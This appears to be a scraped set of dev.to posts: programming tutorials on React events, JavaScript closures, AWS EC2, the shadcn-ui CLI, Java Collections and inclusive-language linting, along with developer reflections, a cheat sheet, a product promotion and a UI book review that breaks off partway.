const handleClick = () => {
console.log('Button clicked!');
};
return (
<div>
<button onClick={handleClick}>Click Me</button>
</div>
);
};
```
2. **Prevent Default Behavior and Stop Propagation:** Use `event.preventDefault()` to prevent default behavior and `event.stopPropagation()` to stop event propagation when necessary.
```jsx
const handleSubmit = (event) => {
event.preventDefault();
// Handle form submission
};
return <form onSubmit={handleSubmit}>...</form>;
```
3. **Clean Up Event Listeners:** When adding event listeners directly to DOM elements, ensure to clean them up to avoid memory leaks.
```jsx
useEffect(() => {
const handleResize = () => {
console.log('Window resized');
};
window.addEventListener('resize', handleResize);
return () => {
window.removeEventListener('resize', handleResize);
};
}, []);
```
4. **Debounce or Throttle High-Frequency Events:** Use debounce or throttle techniques for high-frequency events like scrolling or resizing to improve performance.
```jsx
const debounce = (func, delay) => {
let timeoutId;
return (...args) => {
clearTimeout(timeoutId);
timeoutId = setTimeout(() => {
func.apply(null, args);
}, delay);
};
};
useEffect(() => {
const handleScroll = debounce(() => {
console.log('Scroll event');
}, 300);
window.addEventListener('scroll', handleScroll);
return () => {
window.removeEventListener('scroll', handleScroll);
};
}, []);
```
5. **Use Event Delegation Wisely:** Leverage event delegation for elements that are dynamically added to or removed from the DOM, such as lists of items.
```jsx
const List = () => {
const handleClick = (event) => {
if (event.target.tagName === 'LI') {
console.log(`Item ${event.target.textContent} clicked!`);
}
};
return (
<ul onClick={handleClick}>
<li>Item 1</li>
<li>Item 2</li>
<li>Item 3</li>
</ul>
);
};
```
## Conclusion
Handling events in React efficiently is crucial for creating interactive and high-performance applications. By mastering the techniques of adding event handlers, using synthetic events, passing arguments to event handlers, creating custom events, and leveraging event delegation, you can build robust and scalable applications. Implementing best practices ensures that your code remains maintainable and performant as it grows in complexity. As an architect-level developer, your ability to utilize these advanced techniques will significantly contribute to the success of your projects and the effectiveness of your team. | __zamora__ |
1,917,801 | Would you happen to know about Serverless Computing? | In this video, I talked about what serverless is, why this is so cool, and how this is used in... | 0 | 2024-07-09T20:35:04 | https://dev.to/aws-builders/would-you-happen-to-know-about-serverless-computing-3cl7 | serverless, lambda, cloudoperations, cloudpractitioner | In this video, I talked about what serverless is, why this is so cool, and how this is used in practice!
I hope you enjoy the video. If you have any points to share, please feel free to comment here =).
The AWS content level is between 100 and 200. Please don't forget about serverless. | carlosfilho |
1,917,802 | Celebrating 100 Days of Continuous GitHub Contributions | Reflecting on the journey, challenges, and achievements of maintaining a 100-day GitHub streak. | 0 | 2024-07-09T20:38:59 | https://dev.to/fmcalisto/celebrating-100-days-of-continuous-github-contributions-7h8 | github, opensource, productivity, developer | ---
title: Celebrating 100 Days of Continuous GitHub Contributions
published: true
description: Reflecting on the journey, challenges, and achievements of maintaining a 100-day GitHub streak.
tags: github, opensource, productivity, developer
cover_image: https://github.com/FMCalisto/FMCalisto/blob/main/assets/b30cc86cd6ce4ef0_2.png?raw=true
---

Hey everyone!
I’m excited to share that I’ve just hit 100 days of continuous contributions from [my GitHub profile](https://github.com/FMCalisto) ([@FMCalisto](https://github.com/FMCalisto)). It’s been an incredible journey, filled with learning, challenges, and a lot of coding. I wanted to take a moment to reflect on this milestone and share some insights with you all.
### How It All Started
This streak began on April 1st. No, it wasn’t an April Fool’s joke! I decided to push myself to contribute to GitHub every single day. Initially, it was a way to sharpen my skills and stay disciplined, but it quickly became much more than that. It turned into a daily ritual that I looked forward to, a way to engage with the community, and a personal challenge to see how far I could go.
### My Daily Routine
To keep the streak alive, I developed a daily routine:
- **Morning Planning**: I’d kick off each day with a quick planning session to decide what I’d work on.
- **Consistent Coding**: Whether it was a busy workday or the weekend, I dedicated at least an hour to coding.
- **Leveraging Tools**: Tools like VS Code and GitHub Desktop were my best friends, helping streamline my workflow.
- **Taking Breaks**: To avoid burnout, I made sure to step away from the screen and take breaks.
### Highlights of My Contributions
Over these 100 days, I had the chance to work on a variety of initiatives:
- **[MIMBCD-UI](https://github.com/MIMBCD-UI)**: Added some cool new tools for medical imaging data curation in Machine Learning (ML) projects.
- **[MIDA](https://github.com/mida-project)**: Published the LaTeX source of my PhD Thesis and some other research documents.
### The Challenges
It wasn’t always smooth sailing:
- **Time Management**: Balancing my contributions with other responsibilities was tough. Prioritizing and managing my time effectively was key.
- **Staying Motivated**: There were days when it was hard to stay motivated. Focusing on the impact of my work and the support from the community kept me going.
- **Avoiding Burnout**: Ensuring I took breaks and practiced self-care helped me maintain my energy and enthusiasm.
### Lessons Learned
This journey taught me a lot:
- **Consistency Pays Off**: Small, daily efforts can lead to big achievements.
- **Community is Everything**: The support and feedback from the developer community are invaluable.
- **Never Stop Learning**: Every contribution is an opportunity to learn and grow.
### Looking Ahead
So, what’s next?
- **New Initiatives**: I’m planning to start some new open-source projects and would love for you to join me.
- **Sharing Knowledge**: I’ll keep writing posts and tutorials to share what I’ve learned.
- **Making an Impact**: I aim to contribute to projects that can make a real difference in the community.
### Wrapping Up
Hitting 100 days of continuous contributions is something I’m really proud of. It’s been a journey of growth, learning, and connecting with others. I hope my experience inspires you to start your own streak or just keep contributing in your own way.
Thanks for reading and being part of this journey. Let’s keep coding and making awesome things together!
---
Feel free to drop your questions and thoughts in the comments below. I’d love to hear about your experiences and any tips you have for maintaining a contribution streak.
| fmcalisto |
1,917,803 | Let's Understand JavaScript Closures: A Fundamental Concept | Closures are a powerful feature in JavaScript that allow functions to retain access to their lexical... | 0 | 2024-07-09T20:39:36 | https://dev.to/readwanmd/lets-understand-javascript-closures-a-fundamental-concept-1c54 | javascript, closures | Closures are a powerful feature in JavaScript that allow functions to retain access to their lexical scope, even when the function is executed outside that scope. This can sound abstract, but with some simple examples, you'll see how closures can be both intuitive and incredibly useful in real-world applications.
## What is a Closure?
A closure is created whenever a function is created; every function has an associated closure.
When a function is defined within another function, the inner function retains access to the outer function’s variables. Essentially, a closure gives you access to an outer function’s scope from an inner function.
Here’s a simple definition:
- **Closure**: A combination of a function and its lexical environment within which that function was declared.
## Basic Example
Let’s start with a basic example to illustrate the concept of closures:
```javascript
function outerFunction() {
let outerVariable = 'I am from the outer function';
function innerFunction() {
console.log(outerVariable);
}
return innerFunction;
}
const myClosure = outerFunction();
myClosure(); // Outputs: I am from the outer function
```
In this example:
- `outerFunction` contains a variable `outerVariable` and an inner function `innerFunction`.
- `innerFunction` accesses `outerVariable` and logs it to the console.
- `outerFunction` returns `innerFunction`, and we store it in `myClosure`.
- When `myClosure` is called, it still has access to `outerVariable` even though `outerFunction` has finished executing. This is a closure in action.
## Real-World Example: Creating Private Variables
Closures are often used to create private variables in JavaScript. Here’s an example of how you can use closures to encapsulate data and provide a controlled interface to interact with it:
```javascript
function createCounter() {
let count = 0;
return {
increment: function() {
count++;
console.log(count);
},
decrement: function() {
count--;
console.log(count);
},
getCount: function() {
return count;
}
};
}
const counter = createCounter();
counter.increment(); // Outputs: 1
counter.increment(); // Outputs: 2
counter.decrement(); // Outputs: 1
console.log(counter.getCount()); // Outputs: 1
```
In this example:
- `createCounter` function defines a variable `count` and returns an object with three methods: `increment`, `decrement`, and `getCount`.
- The methods `increment` and `decrement` modify `count`, while `getCount` returns its current value.
- The `count` variable is private to `createCounter` and cannot be accessed directly from outside. This encapsulation is made possible by closures.
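Another common real-world use of the same idea is a `once` wrapper, where a closed-over flag guarantees a function runs only a single time. The `once` helper below is just an illustrative sketch, not something from a library:

```javascript
function once(fn) {
  let called = false; // private state captured by the closure
  let result;
  return function (...args) {
    if (!called) {
      called = true;
      result = fn(...args);
    }
    return result; // later calls return the cached first result
  };
}

const init = once(() => {
  console.log('initializing...');
  return 42;
});

console.log(init()); // logs "initializing..." then 42
console.log(init()); // 42, and "initializing..." is not logged again
```

Because `called` and `result` live in the closure, no outside code can reset or tamper with them.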
## Real-World Example: Delayed Execution
Closures are also useful for functions that need to remember the context in which they were created, such as setting up delayed execution with `setTimeout`:
```javascript
function greet(name) {
return function() {
console.log('Hello, ' + name);
};
}
const delayedGreeting = greet('Alice');
setTimeout(delayedGreeting, 2000); // Outputs: Hello, Alice after 2 seconds
```
In this example:
- `greet` function returns another function that logs a greeting message.
- `delayedGreeting` stores the returned function with the captured `name` variable.
- `setTimeout` executes `delayedGreeting` after 2 seconds, and it still has access to `name` (Alice) due to the closure.
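Before wrapping up, one closure gotcha worth knowing: `var` is function-scoped, so every closure created in a loop shares a single binding, while `let` gives each iteration its own. A quick sketch (collecting the functions in arrays so the difference is easy to see):

```javascript
// With `var`, all three closures share the same `i`, which is 4 after the loop ends
const fnsVar = [];
for (var i = 1; i <= 3; i++) {
  fnsVar.push(function () { return i; });
}
console.log(fnsVar.map(function (f) { return f(); })); // [ 4, 4, 4 ]

// With `let`, each iteration gets a fresh `j`, so each closure keeps its own value
const fnsLet = [];
for (let j = 1; j <= 3; j++) {
  fnsLet.push(function () { return j; });
}
console.log(fnsLet.map(function (f) { return f(); })); // [ 1, 2, 3 ]
```

This is the same mechanism as the `greet` example: each closure captures a binding, not a snapshot of a value.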
## Conclusion
Closures are a fundamental concept in JavaScript that allow functions to access their lexical scope even after the outer function has finished executing. They enable powerful patterns such as data encapsulation, private variables, and delayed execution.
### And Finally,
Please don’t hesitate to point out any mistakes in my writing and any errors in my logic.
I’m appreciative that you read my piece. | readwanmd |
1,917,806 | AWS EC2: Creating, Connecting and Managing Your Instances | If you have read the last article, you must have some idea about an EC2 instance. Amazon EC2... | 27,845 | 2024-07-09T20:45:22 | https://dev.to/ansumannn/aws-ec2-creating-connecting-and-managing-your-instances-3efg | aws, cloud, ec2, devops | If you have read the last article, you must have some idea about an EC2 instance. Amazon EC2 instances are basically virtual machines but in the cloud. This guide will walk you through creating your EC2 instance, securely connecting to it via SSH, and managing it effortlessly using the AWS Command Line Interface (CLI). But before that here are some features of EC2:
### Features of AWS EC2
* **Flexibility**: Choose from a wide range of instance types with varying CPU, memory, storage, and networking capabilities.
* **Scalability**: Easily scale up or down based on demand, ensuring optimal performance and cost efficiency.
* **Security**: Control access with security groups and manage authentication using key pairs for secure SSH access.
* **Integration**: Seamlessly integrates with other AWS services like S3, RDS, and VPC for comprehensive cloud solutions.
* **Cost Management**: Pay only for the resources you use with flexible pricing options and cost-effective billing.
AWS offers 12 months of free tier access to every new user. So if you want to experiment with it, go ahead, but be mindful of the billing cycles. Amazon EC2 empowers businesses and developers to deploy applications quickly and efficiently, making it a cornerstone of cloud computing infrastructure. Now let's get started.
### Creating Your EC2 Instance
#### Step 1: Select an AMI
Think of the Amazon Machine Image (AMI) as your instance’s operating system. Here’s how to get started:
* **Visit the EC2 Dashboard**: Log in to AWS and go to the EC2 Dashboard.
* **Create Your Instance**: Click on "Launch Instance" and choose an AMI. Popular choices include Amazon Linux and Ubuntu.
#### Step 2: Select the Instance Type
Choose the instance type that best fits your needs. For example, `t2.micro` is great for testing and small applications. Be careful here and only select the types with the free tier eligible tag, or you will be charged.
* **Select Instance Type**: Pick the hardware configuration that matches your workload.
#### Step 3: Create Key Pair
Create a key pair that will be used to connect to the EC2 instance, and save it somewhere safe.
* **Generate Keypair and save it**: This will be used to securely connect to your EC2 instance.
#### Step 4: Configure Networking and Add Storage
Set up networking, storage, and any additional configurations. If you are just getting started, you can keep it as default and move on.
* **Configure Instance Details**: Decide on networking settings and add storage as needed.
#### Step 5: Launch Your Instance
Review your configuration and launch your instance. Don’t forget to create or select a key pair for SSH access.

### Connecting to Your EC2 Instance via SSH
Now that your instance is up and running, it’s time to connect to it securely:
1. **Prepare Your Key Pair**: Have your `.pem` key pair file ready, and modify its permissions so SSH will accept it:
```bash
chmod 600 key-pair.pem
```
2. **Connect via SSH**: Find your instance’s Public DNS (IPv4) in the EC2 Dashboard, then use SSH to connect:
```bash
ssh -i /path/to/key-pair.pem ubuntu@<Public-IP-Address>
```


### Managing EC2 Instances with AWS CLI
Harness the power of AWS CLI to manage your EC2 instances efficiently:
1. **Install and Configure AWS CLI**: If not already installed, set up AWS CLI with your AWS credentials.
2. **Launch an Instance**: Use a single command to launch an instance:
```bash
aws ec2 run-instances \
--image-id ami-0a0e5d9c7acc336f1 \
--count 1 \
--instance-type t2.micro \
--key-name MyKeyPairName \
--security-group-ids sg-0a49d3aa3grs60 \
--subnet-id subnet-05617gfhu90a934c1e
```

3. **Check Instance Status**:
```bash
aws ec2 describe-instances --instance-ids i-009ee048cd14619de
```
4. **Terminate an Instance**:
```bash
aws ec2 terminate-instances --instance-ids i-009ee048cd14619de
```
### Conclusion
So with that, we now have a basic understanding of how to create an EC2 instance both through the UI and through the CLI, how to connect to EC2 instances, and how to manage them. This knowledge will be helpful whether you are on a DevOps track or trying to learn about AWS in general. I will share more about AWS as I learn more about it. See you in the next one. | ansumannn |
1,917,807 | Unlocking the Power of React Conversational Agents with Sista AI | Unleash the potential of React conversational agents with Sista AI. Revolutionize user interactions and enhance engagement seamlessly! 🌐✨ | 0 | 2024-07-09T20:45:39 | https://dev.to/sista-ai/unlocking-the-power-of-react-conversational-agents-with-sista-ai-5cmd | ai, react, javascript, typescript | <h2>Introduction</h2><p>The integration of AI assistants into React applications has become a hot topic among developers. Rising demands for enhanced user engagement and accessibility have paved the way for cutting-edge solutions like <strong>Sista AI</strong>. This article delves into the transformative capabilities of React conversational agents and how Sista AI is revolutionizing user interactions.</p><h2>Empowering User Engagement</h2><p>Sista AI offers a revolutionary platform that transforms any app into a smart app with a voice assistant in less than 10 minutes. By leveraging state-of-the-art conversational AI agents, Sista AI guarantees precise responses and an intuitive user experience. Developers can seamlessly integrate AI voice assistants into React apps, enhancing engagement and accessibility.</p><h2>Enhanced User Experience and Accessibility</h2><p>The AI voice assistant supports over 40 languages, ensuring a dynamic and engaging experience for a global audience. With hands-free UI interactions enabled by the multi-tasking UI controller, users can navigate their apps effortlessly. Real-time data integration and personalized customer support further enhance the app's functionality and user satisfaction.</p><h2>Applications Across Industries</h2><p>Sista AI's AI-powered solutions transcend industry boundaries, providing benefits across various sectors, from e-commerce to healthcare. 
By embracing AI technology, businesses can boost user engagement, streamline operations, and deliver personalized experiences to their customers.</p><h2>The Future of Human-Computer Interaction</h2><p>As the digital landscape evolves, AI integration is poised to redefine human-computer interaction. Sista AI's innovative solutions empower developers to create smarter and more intuitive apps that cater to diverse user needs. By embracing AI-driven interactions, businesses can stay ahead of the curve and offer seamless experiences to their users.</p><br/><br/><a href="https://smart.sista.ai?utm_source=sista_blog_devto&utm_medium=blog_post&utm_campaign=big_logo" target="_blank"><img src="https://vuic-assets.s3.us-west-1.amazonaws.com/sista-make-auto-gen-blog-assets/sista_ai.png" alt="Sista AI Logo"></a><br/><br/><p>For more information, visit <a href="https://smart.sista.ai?utm_source=sista_blog_devto&utm_medium=blog_post&utm_campaign=For_More_Info_Banner" target="_blank">sista.ai</a>.</p> | sista-ai |
1,917,808 | What_happens_when_your_type_google_com_in_your_browser_and_press_enter | This diagram illustrates the key steps involved in the request flow: DNS Resolution : The browser... | 0 | 2024-07-09T20:47:55 | https://dev.to/mongezi_sibande_d8869a238/whathappenswhenyourtypegooglecominyourbrowserandpressenter-1b5a |

**_This diagram illustrates the key steps involved in the request flow:_**
1. DNS Resolution: The browser performs a DNS lookup to resolve the hostname www.google.com to an IP address.
2. Firewall: The encrypted HTTPS request from the browser passes through the firewall.
3. Load Balancer: The load balancer receives the encrypted request and distributes it to an available web server.
4. Web Server: The web server forwards the request to the application server.
5. Application Server: The application server fetches data from the database as needed to generate the web page.
6. Database: The application server queries the database to retrieve the necessary data.
7. Web Page Generation: The application server generates the web page and returns it to the web server.
8. Response Flow: The web page is then passed back through the load balancer, firewall, and finally to the browser.
This schema provides a high-level overview of the request flow, including the key components involved (DNS server, firewall, load balancer, web server, application server, and database) and the encryption of the traffic between the browser and the web server. | mongezi_sibande_d8869a238 | |
1,917,809 | shadcn-ui/ui codebase analysis: How does shadcn-ui CLI work? — Part 2.9 | I wanted to find out how shadcn-ui CLI works. In this article, I discuss the code used to build the... | 0 | 2024-07-09T20:48:40 | https://dev.to/ramunarasinga/shadcn-uiui-codebase-analysis-how-does-shadcn-ui-cli-work-part-29-4p37 | javascript, nextjs, shadcnui, opensource | I wanted to find out how shadcn-ui CLI works. In this article, I discuss the code used to build the shadcn-ui/ui CLI.
In part 2.8, we looked at function promptForMinimalConfig and its parameters and how the shadcn-ui CLI uses chalk to highlight text in the terminal.
This is a continuation of part 2.8; in this article, we will look at the concepts below.
1. getRegistryStyles function
2. fetchRegistry function
3. stylesSchema

getRegistryStyles function:
---------------------------
getRegistryStyles is imported from [utils/registry/index.tsx](https://github.com/shadcn-ui/ui/blob/main/packages/cli/src/utils/registry/index.ts#L29).
```js
export async function getRegistryStyles() {
  try {
    const [result] = await fetchRegistry(["styles/index.json"])

    return stylesSchema.parse(result)
  } catch (error) {
    throw new Error(`Failed to fetch styles from registry.`)
  }
}
```
This function fetches the styles registry and parses the result using styles schema.
fetchRegistry function:
-----------------------
getRegistryStyles calls the fetchRegistry function with the parameter `["styles/index.json"]`. Why is the parameter an array?
```js
async function fetchRegistry(paths: string[]) {
  try {
    const results = await Promise.all(
      paths.map(async (path) => {
        const response = await fetch(`${baseUrl}/registry/${path}`, {
          agent,
        })
        return await response.json()
      })
    )

    return results
  } catch (error) {
    console.log(error)
    throw new Error(`Failed to fetch registry from ${baseUrl}.`)
  }
}
```
Notice how the parameter is an array of strings. That is because fetchRegistry uses Promise.all and fetches each path by looping through the paths with map. Navigate to [https://ui.shadcn.com/styles/index.json](https://ui.shadcn.com/styles/index.json), and you will find that the JSON below is fetched when getRegistryStyles is called.

stylesSchema
------------
stylesSchema is a rather simple schema with just a name and a label.
```js
export const stylesSchema = z.array(
z.object({
name: z.string(),
label: z.string(),
})
)
```
Conclusion:
-----------
In this article, I discussed the following concepts:
1. getRegistryStyles function
getRegistryStyles is imported from [utils/registry/index.tsx](https://github.com/shadcn-ui/ui/blob/main/packages/cli/src/utils/registry/index.ts#L29). This function fetches the styles registry and parses the result using styles schema.
2\. fetchRegistry function
getRegistryStyles calls the fetchRegistry function with the parameter `["styles/index.json"]`.
Why is the parameter an array? Because fetchRegistry uses Promise.all and fetches each path by looping through the paths with map. Navigate to [https://ui.shadcn.com/styles/index.json](https://ui.shadcn.com/styles/index.json), and you will find the styles-related JSON that is fetched when getRegistryStyles is called.
3\. stylesSchema
stylesSchema is a rather simple schema with just name and label.
```js
export const stylesSchema = z.array(
z.object({
name: z.string(),
label: z.string(),
})
)
```
> _Want to learn how to build shadcn-ui/ui from scratch? Check out_ [_build-from-scratch_](https://tthroo.com/)
About me:
---------
Website: [https://ramunarasinga.com/](https://ramunarasinga.com/)
Linkedin: [https://www.linkedin.com/in/ramu-narasinga-189361128/](https://www.linkedin.com/in/ramu-narasinga-189361128/)
Github: [https://github.com/Ramu-Narasinga](https://github.com/Ramu-Narasinga)
Email: [ramu.narasinga@gmail.com](mailto:ramu.narasinga@gmail.com)
[Build shadcn-ui/ui from scratch](https://tthroo.com/)
References:
-----------
1. [https://github.com/shadcn-ui/ui/blob/main/packages/cli/src/utils/registry/index.ts#L29](https://github.com/shadcn-ui/ui/blob/main/packages/cli/src/utils/registry/index.ts#L29)
2. [https://github.com/shadcn-ui/ui/blob/main/packages/cli/src/utils/registry/index.ts#L139](https://github.com/shadcn-ui/ui/blob/main/packages/cli/src/utils/registry/index.ts#L139)
3. [https://github.com/shadcn-ui/ui/blob/main/packages/cli/src/utils/registry/schema.ts#L26](https://github.com/shadcn-ui/ui/blob/main/packages/cli/src/utils/registry/schema.ts#L26) | ramunarasinga |
1,917,810 | Software engineering principles cheat sheet | The software engineering principles cheat sheet I would give to myself If I was preparing for... | 0 | 2024-07-09T20:49:16 | https://dev.to/msnmongare/software-engineering-principles-cheat-sheet-3lpn | softwaredevelopment, javascript, beginners, webdev | The software engineering principles cheat sheet I would give to myself If I was preparing for technical interviews again
**🟠 ACID Properties**
1. Atomicity: Transactions are all-or-nothing, fully completed, or not.
2. Consistency: Transactions ensure the database remains in a valid state.
3. Isolation: Transactions operate independently, unaffected by others.
4. Durability: Completed transactions are permanently recorded despite failures.
**🟠SOLID Principles**
1. Single Responsibility: Limit each class to a single responsibility.
2. Open/Closed: Classes should be open for extension but closed for modification.
3. Liskov Substitution: Subclasses should be substitutable for their base classes.
4. Interface Segregation: Prefer small, focused interfaces over broad ones.
5. Dependency Inversion: Rely on abstractions rather than concrete implementations.
**🟠Design Patterns:**
1. Factory Method: Create objects without specifying the exact class.
2. Abstract Factory: Create families of related objects without specifying their concrete classes.
3. Builder: Construct complex objects through a series of steps.
4. Prototype: Copy existing objects without knowing the specifics of their construction.
5. Singleton: Ensure a class has only one instance with a global point of access.
6. Adapter: Enable cooperation between incompatible interfaces.
7. Bridge: Decouple an abstraction from its implementation.
8. Composite: Organize objects into tree structures to represent part-whole hierarchies.
9. Decorator: Add responsibilities to objects dynamically.
10. Facade: Provide a simple interface to a complex system.
11. Flyweight: Reduce the cost of creating and managing many similar objects.
12. Proxy: Control access to another object, handling expensive or complex operations.
13. Command: Encapsulate a request as an object, allowing parameterization and queuing.
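To make one of these patterns concrete, here is a minimal Singleton sketch in JavaScript. This is just one simple way to write it, not a canonical implementation; production code might also guard against direct construction:

```javascript
// Singleton: a class with exactly one instance and a global access point
class Config {
  static getInstance() {
    if (!Config._instance) {
      Config._instance = new Config(); // created lazily on first access
    }
    return Config._instance;
  }
}

const a = Config.getInstance();
const b = Config.getInstance();
console.log(a === b); // true: both variables point to the same instance
```

Every caller that goes through `getInstance()` shares the same object, which is exactly the "one instance, global point of access" guarantee described above.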
**🟠 System Design Principles**
1. Scalability: Design systems to handle growth in users and data smoothly.
2. Performance: Optimize response times and resource utilization.
3. Reliability: Ensure the system functions correctly and consistently.
4. Availability: Design for near-constant operability.
5. Security: Safeguard systems against unauthorized access and vulnerabilities.
6. Maintainability: Facilitate updates and maintenance with minimal disruption.
7. Modularity: Build components that can be updated independently.
8. Reusability: Design for components to be reused across different parts of the system.
9. Decomposability: Break down complex processes into simpler, manageable parts.
10. Concurrency: Design interactions to handle multiple operations simultaneously without conflict. | msnmongare |
1,917,812 | Static Methods for Lists and Collections | The Collections class contains static methods to perform common operations in a collection and a... | 0 | 2024-07-09T21:12:05 | https://dev.to/paulike/static-methods-for-lists-and-collections-4h9j | java, programming, learning, beginners | The **Collections** class contains static methods to perform common operations in a collection and a list. [The section](https://dev.to/paulike/useful-methods-for-lists-eol) introduced several static methods in the **Collections** class for array lists. The **Collections** class contains the **sort**, **binarySearch**, **reverse**, **shuffle**, **copy**, and **fill** methods for lists, and **max**, **min**, **disjoint**, and **frequency** methods for collections, as shown in Figure below.

You can sort the comparable elements in a list in their natural order with the **compareTo** method in the **Comparable** interface. You may also specify a comparator to sort the elements. For example, the following code sorts the strings in a list.
```java
List<String> list = Arrays.asList("red", "green", "blue");
Collections.sort(list);
System.out.println(list);
```
The output is `[blue, green, red]`.
The preceding code sorts a list in ascending order. To sort it in descending order, you can simply use the **Collections.reverseOrder()** method to return a **Comparator** object that orders the elements in reverse of their natural order. For example, the following code sorts a list of strings in descending order.
```java
List<String> list = Arrays.asList("yellow", "red", "green", "blue");
Collections.sort(list, Collections.reverseOrder());
System.out.println(list);
```
The output is `[yellow, red, green, blue]`.
You can use the **binarySearch** method to search for a key in a list. To use this method, the list must be sorted in increasing order. If the key is not in the list, the method returns -(_insertion point_ +1). Recall that the insertion point is where the item would fall in the list if it were present. For example, the following code searches the keys in a list of integers and a list of strings.
```java
List<Integer> list1 = Arrays.asList(2, 4, 7, 10, 11, 45, 50, 59, 60, 66);
System.out.println("(1) Index: " + Collections.binarySearch(list1, 7));
System.out.println("(2) Index: " + Collections.binarySearch(list1, 9));

List<String> list2 = Arrays.asList("blue", "green", "red");
System.out.println("(3) Index: " + Collections.binarySearch(list2, "red"));
System.out.println("(4) Index: " + Collections.binarySearch(list2, "cyan"));
```
The output of the preceding code is:
```
(1) Index: 2
(2) Index: -4
(3) Index: 2
(4) Index: -2
```
You can use the **reverse** method to reverse the elements in a list. For example, the following code displays **[blue, green, red, yellow]**.
```java
List<String> list = Arrays.asList("yellow", "red", "green", "blue");
Collections.reverse(list);
System.out.println(list);
```
You can use the **shuffle(List)** method to randomly reorder the elements in a list. For example, the following code shuffles the elements in **list**.
```java
List<String> list = Arrays.asList("yellow", "red", "green", "blue");
Collections.shuffle(list);
System.out.println(list);
```
You can also use the **shuffle(List, Random)** method to randomly reorder the elements in a list with a specified Random object. Using a specified Random object is useful to generate a list with identical sequences of elements for the same original list. For example, the following code shuffles the elements in **list**.
```java
List<String> list1 = Arrays.asList("yellow", "red", "green", "blue");
List<String> list2 = Arrays.asList("yellow", "red", "green", "blue");
Collections.shuffle(list1, new Random(20));
Collections.shuffle(list2, new Random(20));
System.out.println(list1);
System.out.println(list2);
```
You will see that **list1** and **list2** have the same sequence of elements before and after the shuffling.
You can use the **copy(dest, src)** method to copy all the elements from a source list to a destination list on the same indexes. The destination list must be at least as long as the source list. If it is longer, the remaining elements in the destination list are not affected. For example, the following code copies **list2** to **list1**.
```java
List<String> list1 = Arrays.asList("yellow", "red", "green", "blue");
List<String> list2 = Arrays.asList("white", "black");
Collections.copy(list1, list2);
System.out.println(list1);
```
The output for **list1** is `[white, black, green, blue]`. The **copy** method performs a shallow copy: only the references of the elements from the source list are copied.
You can use the **nCopies(int n, Object o)** method to create an immutable list that consists of **n** copies of the specified object. For example, the following code creates a list with five **Calendar** objects.
```java
List<GregorianCalendar> list1 = Collections.nCopies(5, new GregorianCalendar(2005, 0, 1));
```
The list created from the **nCopies** method is immutable, so you cannot add, remove, or update elements in the list. All the elements have the same references.
You can use the **fill(List list, Object o)** method to replace all the elements in the list with the specified element. For example, the following code displays `[black, black, black]`.
```java
List<String> list = Arrays.asList("red", "green", "blue");
Collections.fill(list, "black");
System.out.println(list);
```
You can use the **max** and **min** methods for finding the maximum and minimum elements in a collection. The elements must be comparable using the **Comparable** interface or the **Comparator** interface. For example, the following code displays the largest and smallest strings in a collection.
```java
Collection<String> collection = Arrays.asList("red", "green", "blue");
System.out.println(Collections.max(collection));
System.out.println(Collections.min(collection));
```
The **disjoint(collection1, collection2)** method returns **true** if the two collections have no elements in common. For example, in the following code, **disjoint(collection1, collection2)** returns **false**, but **disjoint(collection1, collection3)** returns **true**.
```java
Collection<String> collection1 = Arrays.asList("red", "cyan");
Collection<String> collection2 = Arrays.asList("red", "blue");
Collection<String> collection3 = Arrays.asList("pink", "tan");
System.out.println(Collections.disjoint(collection1, collection2));
System.out.println(Collections.disjoint(collection1, collection3));
```
The **frequency(collection, element)** method finds the number of occurrences of the element in the collection. For example, **frequency(collection, "red")** returns **2** in the following code.
```java
Collection<String> collection = Arrays.asList("red", "cyan", "red");
System.out.println(Collections.frequency(collection, "red"));
```
| paulike |
1,917,813 | Practicing politeness in JavaScript code 🤬 | Imagine that you published a big open source project and many people are currently changing your code... | 0 | 2024-07-09T21:52:29 | https://dev.to/silentwatcher_95/practicing-politeness-in-javascript-code-535g | javascript, node, tutorial, learning | Imagine that you published a big open source project and many people are currently changing your code or updating the project documents.
What if someone accidentally writes something race-related, gender-favoring, polarizing, etc.? 👀

we have a tool called **alex** !
According to what is written in the [documentation ](https://github.com/get-alex/alex) of this tool:
> Whether your own or someone else’s writing, alex helps you find gender favoring, polarizing, race related, or other unequal phrasing in text.
## Set up Alex in our project
in order to use alex inside our project , first we need to install its package.
it will be a good practice if you install alex as a dev-dependency
or you can just install it globally in your system.
```bash
npm i -D alex
```
Alex reads plain text, HTML, MDX, or markdown as input.
One of its uses is to scan all project documents for any literary issues.
Let’s assume that all our documents are written in Markdown format, so we instruct Alex to check all files with a .md extension
In our package.json file, we can create a script like:
```json
{
"scripts": {
"test-doc" : "npx alex *.md"
}
```
After that, I create a file called policy.md as an example document:
```md
## the boogeyman walked to class
```
if you run the **test-doc** command, you will probably get this result:
```bash
> test-doc
> npx alex *.md
policy.md
1:8-1:17 warning `boogeyman` may be insensitive, use `boogeymonster` instead boogeyman-boogeywoman retext-equality
‼ 1 warning
```
You can use this command together with tools such as **Husky ** and **lint-staged** to run the process of checking your files automatically. 🤖
What are your thoughts on this tool, and how crucial is compliance with this matter for software projects? 🧐🤗
| silentwatcher_95 |
1,917,814 | 12 Lessons for a better UI - Refactoring UI The Book | Hello everyone, I'm Juan, and today I want to share some of the things that I've learned while... | 0 | 2024-07-09T21:16:44 | https://dev.to/juanemilio31323/12-lessons-for-a-better-ui-refactoring-ui-the-book-4ea1 | frontend, ui, ux, webdev | Hello everyone, I'm Juan, and today I want to share some of the things that I've learned while reading [Refactoring UI](https://www.refactoringui.com/). It's amazing how much you can learn from the right book.
Not so long ago, I started working on a new project of my own, and to my surprise, I found myself trapped and blocked with the UI that I was designing. I couldn't decide on colors, sizes—basically anything important for a UI was escaping me. So I decided to do what I always do when I don't know how to proceed: find a book that I think has the answer to my problem. Worst case scenario, I'll learn something new. To my surprise, _Refactoring UI_ wasn't just the solution I was looking for; it also rekindled my interest in UI design. So if you need something like that, prepare yourself, because we are going to check out the most disruptive and interesting lessons I learned from this book.
From now on, I invite you to check out the book and buy it because there's no waste. With that said, let's proceed.
## 1 - Do It and Do It Fast
Probably the reason why this lesson struck me as so interesting is because lately, I've been talking and [writing](https://medium.com/@theprof301/48hs-is-all-you-need-15083345c5d5) nonstop about the importance of finishing a project before obsessing over the details.
> In the earliest stages of designing a new feature, it’s important that you don’t get hung up making low-level decisions about things like typefaces, shadows, icons, etc.
\ - Page 10
I found this reaffirming, and not only that, but the book proposes an exercise to make this process even easier. Take a sharpie and draw on paper; it's really hard to obsess over the details.
## 2 - Not the Layout but Instead the Feature
What is an app? Try to come up with an answer before moving on. An app is a collection of features, at least that's what _Refactoring UI_ tells us:
> The thing is, an “app” is actually a collection of features...
> - Page 7
